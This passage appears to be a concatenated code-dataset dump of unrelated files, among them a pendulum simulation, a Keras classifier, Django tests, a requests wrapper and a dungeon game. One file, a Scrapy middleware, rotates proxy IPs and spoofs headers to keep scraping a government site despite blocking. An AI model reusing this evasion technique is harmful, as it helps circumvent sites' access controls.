int(round(math.cos(degrees/180.0*math.pi)*cursorLength+windowCenter[0]))\r\n yPos = int(round(math.sin(degrees/180.0*math.pi)*cursorLength+windowCenter[1]))\r\n return (xPos, yPos)\r\n\r\ndef getWirePositionDegrees(position, scale):\r\n offset = -270\r\n degrees = 360 / scale * position + offset\r\n return degrees\r\n\r\ndef drawPendulum(color, width, length, position, scale):\r\n end = getCirclePoint(position, scale, length);\r\n pygame.draw.line(screen, color, 
windowCenter, end, width)\r\n pygame.draw.circle(screen, white, end, 30)\r\n pygame.draw.circle(screen, white, windowCenter, 8)\r\n\r\n\r\ndef calculateDelta(time, alpha=45.0, gravity=9.81, wireLength=5.0):\r\n # dampingConstant = 1.0/20.0\r\n # e^(-dampingConstant*time) = 1.0/e^(dampingConstant*time)\r\n damping = 1.0/math.exp(time/20.0)\r\n alpha = alpha*math.cos(math.sqrt(gravity/wireLength)*time)*damping\r\n \r\n return alpha\r\n\r\ndef main():\r\n # Initialise screen\r\n global screen, alpha\r\n pygame.init()\r\n pygame.display.set_caption('Pendel-Simulation')\r\n screen = pygame.display.set_mode((windowWidth, windowHeight), pygame.HWSURFACE | pygame.DOUBLEBUF)\r\n\r\n # Event loop\r\n delay = 20\r\n time = 0.0\r\n alpha = 45.0\r\n while True:\r\n handleEvents()\r\n screen.fill(backgroundColor)\r\n \r\n drawPendulum(white, 3, 300, alpha, 360)\r\n alpha = calculateDelta(time)\r\n time += 0.02\r\n \r\n pygame.display.flip()\r\n pygame.time.delay(delay)\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"coding4fun/kapitel10/pendulum_v1.py","file_name":"pendulum_v1.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"598927252","text":"from tensorflow import keras\nfrom preprocessing import train_data, train_labels, test_data, test_labels\nimport matplotlib.pyplot as plt\n\nfilters = 32\nmodel = keras.Sequential([\n keras.layers.Conv2D(filters, (3, 3), padding='same', input_shape=train_data.shape[1:], activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 2, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 2, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 3, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 4, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 3, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.Dropout(0.2),\n\n keras.layers.Flatten(),\n keras.layers.Dense(filters * 3, activation='relu'),\n keras.layers.Dense(4, activation='softmax')\n])\n\nmodel.compile(optimizer=keras.optimizers.Adam(lr=0.0001),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nhistory = model.fit(train_data, train_labels, epochs=20, validation_split=0.12)\n\n\ndef graphs(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.grid()\n plt.show()\n\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.grid()\n plt.show()\ngraphs(history)\n\n\nresults = model.evaluate(test_data, test_labels)\nprint('test loss, test acc:', results)\n\nmodel.save('model.h5', include_optimizer=False)\nprint(\"Saved model to 
disk\")\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"130149275","text":"from django.test import TestCase\n\nfrom error_posts.mommy_recipes import django_traceback\nfrom error_posts.models import ErrorPost\nfrom error_posts.forms import ErrorPostForm\n\nfrom django_comments.models import Comment\nfrom django_comments.forms import CommentSecurityForm\nfrom error_posts.forms import CommentFormWithMarkDown\nfrom model_mommy import mommy\nfrom users.models import User\n\n\nclass TestErrorPostForm(TestCase):\n\n def setUp(self):\n self.form = ErrorPostForm\n self.params = {\n 'exception_type': 'A',\n 'error_message': 'A',\n 'traceback': django_traceback,\n 'django_version': '1.9',\n 'recaptcha': 'a',\n }\n\n def test_save_form_success(self):\n error_post_form = self.form(self.params)\n error_post_form.save(data_came_from=\"site\")\n error_post_count = ErrorPost.objects.count()\n self.assertEqual(error_post_count, 1)\n\n def test_form_is_valid(self):\n error_post_form = self.form(self.params)\n self.assertEqual(error_post_form.is_valid(), True)\n\n def test_save_form_create_right_object(self):\n error_post_form = self.form(self.params)\n error_post_form.save(data_came_from=\"site\")\n error_post = ErrorPost.objects.first()\n self.assertEqual(error_post.exception_type, self.params['exception_type'])\n self.assertEqual(error_post.error_message, self.params['error_message'])\n self.assertEqual(error_post.traceback, self.params['traceback'])\n self.assertEqual(error_post.django_version, self.params['django_version'])\n\n def test_initialized_fields_are_readonly(self):\n error_post_form = self.form(initial=self.params)\n self.assertEqual(error_post_form['traceback'].field.widget.attrs['readonly'], True)\n self.assertEqual(error_post_form['django_version'].field.widget.attrs['readonly'], True)\n self.assertEqual(error_post_form['exception_type'].field.widget.attrs['readonly'], True)\n self.assertEqual(error_post_form['error_message'].field.widget.attrs['readonly'], True)\n\n def test_create_error_post_with_data_from_lib(self):\n error_post_form = self.form(self.params)\n error_post_form.save(data_came_from=\"lib\")\n error_post = ErrorPost.objects.first()\n self.assertEqual(error_post.data_came_from, \"lib\")\n\n def test_create_error_post_with_data_from_site(self):\n error_post_form = self.form(self.params)\n error_post_form.save(data_came_from=\"site\")\n error_post = ErrorPost.objects.first()\n self.assertEqual(error_post.data_came_from, \"site\")\n\n\nclass TestCommentForm(TestCase):\n\n def setUp(self):\n self.form = CommentFormWithMarkDown\n self.params = {\n 'name': 'Alessandro',\n 'email': 'alessandro.henrique@labcodes.com.br',\n 'comment': 'This is a simple comment',\n }\n self.user = mommy.make(User)\n self.security_dict = CommentSecurityForm(self.user).generate_security_data()\n self.params.update(self.security_dict)\n self.comment = mommy.make(Comment)\n\n\n def test_form_is_valid(self):\n comment_form = self.form(data=self.params, target_object=self.comment)\n self.assertEqual(comment_form.is_valid(), True)\n","sub_path":"error_posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580998418","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 18 14:32:05 2016\n\n@author: carlo\n\"\"\"\nimport 
scipy.stats as st\nimport numpy as np\n\nfor df in [2, 4, 6, 8, 59]:\n    fname = \"chi2df\" + str(df) + \".csv\"\n    print (\"Generating file: %s\" % fname)\n\n    max_cval = st.chi2.isf(.01, df)\n    print (\"Max. ChiSqr : %f\" % max_cval)\n\n    q = np.arange(0, max_cval, 0.01)\n    print (\"Number of lines: %d\" % len(q))\n\n    f = open (fname,'w')\n    for t in q:\n        p = st.chi2.sf(t,df)\n        f.write(\"%.2f,%.5f\\n\" % (t,p))\n    f.close()\n    print()\n\n\n","sub_path":"chi2table_gen.py","file_name":"chi2table_gen.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"400312831","text":"# coding:utf-8\r\nimport pandas as pd\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\n# 1. Prepare the data\r\ndata=pd.read_excel(r'data1.xlsx',header=None)\r\nbiaoq=data.columns\r\nx_data = data[biaoq[:3]]\r\ny_data = data[biaoq[3]]\r\nx_train =x_data[:900]\r\nx_test = x_data[900:]\r\ny_train = y_data[:900]\r\ny_test = y_data[900:]\r\n\r\n# 2. Build the classifier\r\nknn = KNeighborsClassifier(n_neighbors=7)\r\n# 3. Train the model\r\nknn.fit(x_train,y_train)\r\n# 4. Predict with the model\r\ny_ = knn.predict(x_test)\r\n# 5. Accuracy\r\ngl= knn.score(x_test,y_test)\r\nprint(gl)\r\n","sub_path":"机器学习/k邻近分类.py","file_name":"k邻近分类.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"464730464","text":"import unittest\n\nfrom ddby import Money\n\nclass TestMoney(unittest.TestCase):\n\n    def test_adding_two_monies(self):\n        m1 = Money(500, 'USD')\n        m2 = Money(200, 'USD')\n\n        actual = m1 + m2\n        expected = Money(700, 'USD')\n\n        assert actual == expected\n\n    def test_subtracting_two_monies(self):\n        m1 = Money(500, 'USD')\n        m2 = Money(200, 'USD')\n\n        actual = m1 - m2\n        expected = Money(300, 'USD')\n\n        assert actual == expected\n\n    def test_adding_two_monies_of_different_precision(self):\n        m1 = Money(340, 'USD')\n        m2 = Money(4501, 'USD', 3)\n\n        expected = Money(7901, 'USD', 3)\n        actual = m1 + m2\n\n        assert actual.precise_amount == expected.precise_amount\n        assert actual.precision == expected.precision\n\n    def test_subtracting_two_monies_of_different_precision(self):\n        m1 = Money(4501, 'USD', 3)\n        m2 = Money(340, 'USD')\n\n        expected = Money(1101, 'USD', 3)\n        actual = m1 - m2\n\n        assert actual.precise_amount == expected.precise_amount\n        assert actual.precision == expected.precision\n\n    def test_multipying_a_money_object(self):\n        m1 = Money(4500, 'USD')\n        m_amount = 2\n        \n        expected = Money(9000, 'USD')\n\n        actual = m1 * m_amount\n\n        assert actual == expected\n\n    def test_dividing_a_money_object(self):\n        m1 = Money(9000, 'USD')\n        m_amount = 2\n        \n        expected = Money(4500, 'USD')\n\n        actual = m1 / m_amount\n\n        assert actual == expected, \"Actual not equal to expected: {0} :: {1}\".format(actual, expected)\n\n    def test_iadd(self):\n        m1 = Money(9000, 'USD')\n        add_amount = Money(3000, 'USD')\n\n        expected = Money(12000, 'USD')\n        m1 += add_amount\n        assert m1 == expected\n\n    def test_rmultiply(self):\n        m1 = Money(4500, 'USD')\n        m_amount = 2\n        expected = Money(9000, 'USD')\n        actual = m_amount * m1\n\n        assert actual == expected\n\nif __name__ == '__main__':\n    unittest.main()\n\n","sub_path":"tests/test_math.py","file_name":"test_math.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"30326547","text":"# -*- encoding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport requests\n\nfrom builtins import bytes\nfrom builtins 
import str\nfrom copy import deepcopy\n\n\nclass YRequests(object):\n    \"\"\" Class to make simple requests. It is a wrapper around the `requests` module, but\n    it tries to handle all errors.\n\n    How to use:\n\n    >>> from yrequests import YRequests\n    >>> req = YRequests()\n    >>> result = req.get('http://url.com/a/b/c', params={'q': 'apple'})\n    >>> if result['ok']:\n    >>>     print(result['text']) # or result['json']\n    >>>     # do stuff when everything is fine\n    >>> else:\n    >>>     print(result['error']) # or result['status_code']\n    >>>     # do stuff when an error occurs\n    >>>\n\n    You can also use `post`, `put`, `delete`, `head` and `options`. These\n    (HTTP) methods receive the same parameters as the `requests` module. If you need\n    instructions on how the `requests` module works, take a look at:\n    http://docs.python-requests.org/en/master/user/quickstart/\n\n    The `result` is a `dict` object:\n\n    >>> result = {\n    >>>     'ok': <bool>,\n    >>>     'error': <str>,\n    >>>     'error_type': <str>,\n    >>>     'response': <response object>,\n    >>>     'headers': <dict>,\n    >>>     'status_code': <int>,\n    >>>     'content_type': <str>,\n    >>>     'text': <unicode>,\n    >>>     'json': <dict>,\n    >>> }\n    >>>\n\n    Result keys:\n    - ok: True if everything is fine. Always check this value.\n    - error: Textual error (when `ok` is False).\n    - error_type: A string with the error type code:\n      general: General error.\n      connection: DNS problem, connection refused, etc. The only exception is\n        timed out that has its own code (below).\n      timeout: Connection timed out.\n      http: HTTP errors such as 404, 403, 500, etc.\n      json: \"Content-Type\" header is indicated as JSON but the content is not\n        a valid JSON.\n    - response: A response object of request (same as the `requests` module). You\n      can use it as a fallback to check information that is not handled by this\n      class.\n    - headers: Dictionary with the response headers (same as the `requests.response`\n      module).\n    - status_code: Integer HTTP status code (200, 404, 500, etc).\n    - content_type: The \"Content-Type\" header value.\n    - text: The content of response (if any). It's always unicode.\n    - json: A dictionary of the content if the \"Content-Type\" header is\n      indicated as JSON.\n    \"\"\"\n\n    ERROR_GENERAL = 'general'\n    ERROR_CONNECTION = 'connection'\n    ERROR_TIMEOUT = 'timeout'\n    ERROR_HTTP = 'http'\n    ERROR_JSON = 'json'\n\n    def __init__(self, timeout=60, headers=None):\n        \"\"\"\n        :param timeout: Default timeout (seconds) for all requests.\n        :param headers: Default headers (`dict`) for all requests.\n        \"\"\"\n        self.headers = headers or {}\n        self.timeout = timeout\n\n    def __get_result_tpl(self):\n        return {\n            'ok': False,\n            'error': None,\n            'error_type': None,\n            'response': None,\n            'headers': {},\n            'status_code': None,\n            'content_type': None,\n            'text': None,\n            'json': None,\n        }\n\n    def __e_to_str(self, e):\n        if isinstance(e, bytes):\n            e = e.decode('utf-8')\n        else:\n            e = str(e)\n        return e\n\n    def __req(self, method, *args, **kwargs):\n        \"\"\" Make a request. The `args` and `kwargs` are passed to\n        the respective `requests.<method>`.\n\n        The first parameter is required and indicates the HTTP method. The\n        other parameters will be passed to the `requests` function.\n\n        The `headers` and `timeout` parameters are filled using the headers and\n        timeout passed in the constructor (`__init__`). If this method receives\n        a `headers` or `timeout` it will override the default values. 
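        For example (illustrative only; these header names are arbitrary, not part of the library):\n\n        >>> req = YRequests(timeout=60, headers={'X-Token': 'abc'})\n        >>> req.get('http://url.com', headers={'Accept': 'application/json'})\n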
The\n        `headers` parameter only overrides the specified keys of the default\n        headers.\n\n        This method always returns a `dict` object (result):\n\n        >>> result = {\n        >>>     'ok': <bool>,\n        >>>     'error': <str>,\n        >>>     'error_type': <str>,\n        >>>     'response': <response object>,\n        >>>     'headers': <dict>,\n        >>>     'status_code': <int>,\n        >>>     'content_type': <str>,\n        >>>     'text': <unicode>,\n        >>>     'json': <dict>,\n        >>> }\n        >>>\n\n        Result keys:\n        - ok: True if everything is fine. Always check this value.\n        - error: Textual error (when `ok` is False).\n        - error_type: A string with the error type code:\n          general: General error.\n          connection: DNS problem, connection refused, etc. The only exception is\n            timed out that has its own code (below).\n          timeout: Connection timed out.\n          http: HTTP errors such as 404, 403, 500, etc.\n          json: \"Content-Type\" header is indicated as JSON but the content is not\n            a valid JSON.\n        - response: A response object of request (same as the `requests` module). You\n          can use it as a fallback to check information that is not handled by this\n          class.\n        - headers: Dictionary with the response headers (same as the `requests.response`\n          module).\n        - status_code: Integer HTTP status code (200, 404, 500, etc).\n        - content_type: The \"Content-Type\" header value.\n        - text: The content of response (if any). It's always unicode.\n        - json: A dictionary of the content if the \"Content-Type\" header is\n          indicated as JSON.\n\n        :param method: A string with the HTTP method (GET, POST, PUT, DELETE,\n            HEAD, OPTIONS).\n        :param args: Positional arguments for `requests.<method>`.\n        :param kwargs: Keyword arguments for `requests.<method>`.\n        :return: Result dictionary.\n        \"\"\"\n        result = self.__get_result_tpl()\n        kwargs = deepcopy(kwargs)\n        headers = {}\n\n        if 'timeout' not in kwargs and self.timeout:\n            kwargs['timeout'] = self.timeout\n\n        if self.headers:\n            headers.update(self.headers)\n\n        if 'headers' in kwargs:\n            headers.update(kwargs['headers'])\n\n        kwargs['headers'] = headers\n\n        request_func_methods = {\n            'GET': requests.get,\n            'POST': requests.post,\n            'PUT': requests.put,\n            'DELETE': requests.delete,\n            'HEAD': requests.head,\n            'OPTIONS': requests.options,\n        }\n\n        request_func = request_func_methods.get(method)\n\n        if request_func is None:\n            result['error'] = 'Method %s is not allowed' % method\n            result['error_type'] = self.ERROR_GENERAL\n            return result\n\n        try:\n            response = request_func(*args, **kwargs)\n        except requests.ConnectionError as e:\n            result['error'] = self.__e_to_str(e)\n            result['error_type'] = self.ERROR_CONNECTION\n            return result\n        except requests.Timeout as e:\n            result['error'] = self.__e_to_str(e)\n            result['error_type'] = self.ERROR_TIMEOUT\n            return result\n        except Exception as e:\n            result['error'] = self.__e_to_str(e)\n            result['error_type'] = self.ERROR_CONNECTION\n            return result\n\n        result['response'] = response\n        result['headers'] = response.headers\n        result['status_code'] = response.status_code\n        try:\n            result['content_type'] = response.headers['content-type']\n        except KeyError:\n            result['content_type'] = None\n\n        if isinstance(response.text, str):\n            result['text'] = response.text\n\n        is_json = False\n        if result['content_type'] and '/json' in result['content_type']:\n            is_json = True\n\n        if is_json:\n            try:\n                result['json'] = response.json()\n            except (ValueError, TypeError):\n                result['error'] = 'The content is not a valid JSON.'\n                result['error_type'] = self.ERROR_JSON\n                return result\n\n        try:\n            response.raise_for_status()\n        except requests.HTTPError as e:\n            result['error'] = self.__e_to_str(e)\n            result['error_type'] = self.ERROR_HTTP\n            return result\n        except Exception 
as e:\n            result['error'] = self.__e_to_str(e)\n            result['error_type'] = self.ERROR_GENERAL\n            return result\n\n        result['ok'] = True\n        return result\n\n    def get(self, *args, **kwargs):\n        return self.__req('GET', *args, **kwargs)\n\n    def post(self, *args, **kwargs):\n        return self.__req('POST', *args, **kwargs)\n\n    def put(self, *args, **kwargs):\n        return self.__req('PUT', *args, **kwargs)\n\n    def delete(self, *args, **kwargs):\n        return self.__req('DELETE', *args, **kwargs)\n\n    def head(self, *args, **kwargs):\n        return self.__req('HEAD', *args, **kwargs)\n\n    def options(self, *args, **kwargs):\n        return self.__req('OPTIONS', *args, **kwargs)\n","sub_path":"yrequests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"541346564","text":"\"\"\"\nSuppose you have a long flowerbed in which some of the plots are planted and some are not. However, flowers cannot be planted in adjacent plots - they would compete for water and both would die.\n\nGiven a flowerbed (represented as an array containing 0 and 1, where 0 means empty and 1 means not empty), and a number n, return if n new flowers can be planted in it without violating the no-adjacent-flowers rule.\n\n\"\"\"\n# Greedy: place a flower at every vacant spot encountered from left to right\nclass Solution(object):\n    def canPlaceFlowers(self, flowerbed, n):\n        \"\"\"\n        :type flowerbed: List[int]\n        :type n: int\n        :rtype: bool\n        \"\"\"\n        i = count = 0\n        while i < len(flowerbed):\n            if (flowerbed[i] == 0 and (i == 0 or flowerbed[i - 1] == 0) and (i == len(flowerbed) - 1 or flowerbed[i + 1] == 0)):\n                # plant here; the extra increment below skips the adjacent plot\n                i += 1\n                count += 1\n                if(count>=n):\n                    return True\n            i += 1\n        return count >= n\n","sub_path":"python_leetcode_2020/Python_Leetcode_2020/605_can_place_flowers.py","file_name":"605_can_place_flowers.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"310437333","text":"from scrapy.utils.project import get_project_settings\nimport random\nimport requests\nfrom pybase.apollo_setting import get_project_settings as apollo_settings\nfrom scrapy.exceptions import IgnoreRequest\n\nUSER_AGENT_BOX = [\n    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1',\n    'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0',\n    'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50',\n    'Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.9.168 Version/11.50',\n    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; Tablet PC 2.0; .NET4.0E)',\n    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3)',\n    'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.0)',\n    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',\n    'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',\n    'Mozilla/5.0 (Windows; U; Windows NT 6.1; ) AppleWebKit/534.12 (KHTML, like Gecko) Maxthon/3.0 Safari/534.12',\n    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; 
.NET4.0C; .NET4.0E)',\n    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)',\n    'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0',\n    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)',\n    'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1 QQBrowser/6.9.11079.201',\n    'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) QQBrowser/6.9.11079.201',\n    'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)']\n\nfrom scrapy.downloadermiddlewares.retry import RetryMiddleware\n\n# exception classes we need to catch (important)\nfrom twisted.internet import defer\nfrom twisted.internet.error import TimeoutError, DNSLookupError, \\\n    ConnectionRefusedError, ConnectionDone, ConnectError, \\\n    ConnectionLost, TCPTimedOutError\nfrom scrapy.http import HtmlResponse\nfrom twisted.web.client import ResponseFailed\nfrom scrapy.core.downloader.handlers.http11 import TunnelError\n\nimport time\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass ScrapyproxyMiddleware(RetryMiddleware):\n\n    def __init__(self, settings):\n        self.count = 0\n        self.proxy_ip1 = [\"60.184.116.116:20681\"] # arbitrary seed value\n        self.setting = get_project_settings()\n        self.apollo_setting = apollo_settings()\n        self.proxy_conf = self.apollo_setting.get('PROXY_GET_URL')\n        self.USER_AGENT_BOX = USER_AGENT_BOX\n\n        self.max_retry_times = settings.getint('RETRY_TIMES')\n        self.retry_http_codes = set(int(x) for x in settings.getlist('RETRY_HTTP_CODES'))\n        self.priority_adjust = settings.getint('RETRY_PRIORITY_ADJUST')\n\n    def get_ip(self):\n        p = requests.get('http://192.168.3.85:5010/get').json()\n        if p.get(\"code\") == 0:\n            logger.warning(p.get(\"src\"))\n            time.sleep(60)\n            return self.get_ip()\n        else:\n            proxy_ip = p.get('proxy')\n            print(proxy_ip)\n            self.count = self.count + 1\n            self.handle_ip_error(self.count)\n            return proxy_ip\n\n    def process_request_back(self, request, spider):\n        self.proxy_ip1[-1] = self.get_ip()\n        request.meta[\"proxy\"] = self.proxy_ip1[-1]\n\n    # intercept requests\n    def process_request(self, request, spider):\n        # ua = random.choice(self.USER_AGENT_BOX)\n        request.headers[\n            'User-Agent'] = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\"\n        request.headers['Host'] = 'whlyj.beijing.gov.cn'\n        proxy_ip = self.proxy_ip1[-1] # self.proxy_ip1 is a list that always holds exactly one value; the same IP stays fixed until an exception occurs, instead of switching to a different IP on every request\n        if request.url.startswith('http:'):\n            proxy = f'http://{proxy_ip}'\n        elif request.url.startswith('https:'):\n            proxy = f\"https://{proxy_ip}\"\n        request.meta['proxy'] = proxy\n\n    # intercept responses\n    def process_response(self, request, response, spider):\n        # if the returned response status is not 200, re-issue the current request object\n        if response.status == 404: # status code: 404\n            return response # 404 usually means the page does not exist, so do not retry; 404 pages are skipped automatically\n        elif response.status != 200: # status code: not 200\n            self.process_request_back(request, spider)\n            return request\n        else: # status code: 200\n            return response\n\n    # intercept exceptions\n    def process_exception(self, request, exception, spider): # handle all exceptions: attach a fresh proxy and return the request\n        if isinstance(exception, 
TimeoutError):\n            self.process_request_back(request, spider)\n            return request # key step\n        elif isinstance(exception, ConnectionRefusedError):\n            self.process_request_back(request, spider)\n            return request # key step\n        elif isinstance(exception, TCPTimedOutError):\n            self.process_request_back(request, spider)\n            return request # key step\n\n        elif isinstance(exception, ConnectionLost):\n            self.process_request_back(request, spider)\n            return request # key step\n\n        else:\n            self.process_request_back(request, spider)\n            return request # key step\n\n    def handle_ip_error(self, count1):\n        import os\n        # Many proxy IPs may turn out to be unusable and get wasted, so it makes sense to cap the number of IPs used; once the maximum is reached, shut the spider down so IPs are not consumed indefinitely and crawler resources are not wasted.\n        limit_ipcount = 200 # configurable\n        if count1 > limit_ipcount:\n            print(\"More than %s proxy IPs used, the spider is about to shut down\" % limit_ipcount)\n            os._exit(0)\n        else:\n            return count1\n","sub_path":"Scrapy_CQC_NYDL_SNCY_chinabz/Scrapy_CQC_NYDL_SNCY_chinabz/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"466331316","text":"\n\nfrom xai.brain.wordbase.nouns._butler import _BUTLER\n\n#class header\nclass _BUTLERS(_BUTLER, ):\n\tdef __init__(self,): \n\t\t_BUTLER.__init__(self)\n\t\tself.name = \"BUTLERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"butler\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_butlers.py","file_name":"_butlers.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"346835216","text":"import logging\nimport pdb\nimport random\n\n#list of locations\n\nCELLS = [(0,0),(0,1),(0,2),\n         (1,0),(1,1),(1,2),\n         (2,0),(2,1),(2,2)]\nlogging.basicConfig(filename='game.log',level=logging.DEBUG)\n\ndef getLocations():\n\n    monster = random.choice(CELLS)\n    door = random.choice(CELLS)\n    start = random.choice(CELLS)#this is the player\n    if monster == door or monster == start or door == start:\n        return getLocations()\n\n    return monster,door,start\n\n\ndef movePlayer(player,move):\n    x,y = player\n\n    if move == 'LEFT':\n        y -=1\n    elif move == 'RIGHT':\n        y+=1\n    elif move == 'UP':\n        x-=1\n    elif move == 'DOWN':\n        x+=1\n\n    return x,y\n\ndef getMoves(player):\n    moves = ['LEFT','RIGHT','UP','DOWN']\n    if player[1] == 0:\n        moves.remove('LEFT')\n    if player[1] == 2:\n        moves.remove('RIGHT')\n\n    if player[0] == 0:\n        moves.remove('UP')\n    if player[0] == 2:\n        moves.remove('DOWN')\n\n\n\n    return moves\n\ndef drawMap(player):\n    print('_ _ _')\n    tile = '|{}'\n    for idx, cell in enumerate(CELLS):\n        if idx in [0,1,3,4,6,7]:\n            if cell == player:\n                print(tile.format('X'), end ='')\n            else:\n                print(tile.format('_'), end='')\n        else:\n            if cell == player:\n                print(tile.format('X|'))\n            else:\n                print(tile.format('_|'))\n\n\nmonster, door, player = getLocations()#grabs the elements returned from the getlocations function\nlogging.info('monster: {}: door: {}'.format(monster,door))\nprint(\"Welcome to the dungeon\")\nwhile True:\n    moves = getMoves(player)\n\n    print(\"You're currently in room {}\".format(player)) #fill in with player position\n    drawMap(player)\n    print(\"You can move {}\".format(moves)) #fill in with available moves\n    print(\"Enter QUIT to quit\")\n\n    move = input(\"> \")\n    move = move.upper()\n\n    if move == 'QUIT':\n        break\n    if move in moves:\n        player = movePlayer(player,move)\n    else:\n        print(\"**Haha you ran into a wall, try again\")\n        continue\n    if player == door:\n        print(\"Lucky, you have escaped!\")\n        break\n    elif player == monster:\n        print(\"Bad Move, you are now 
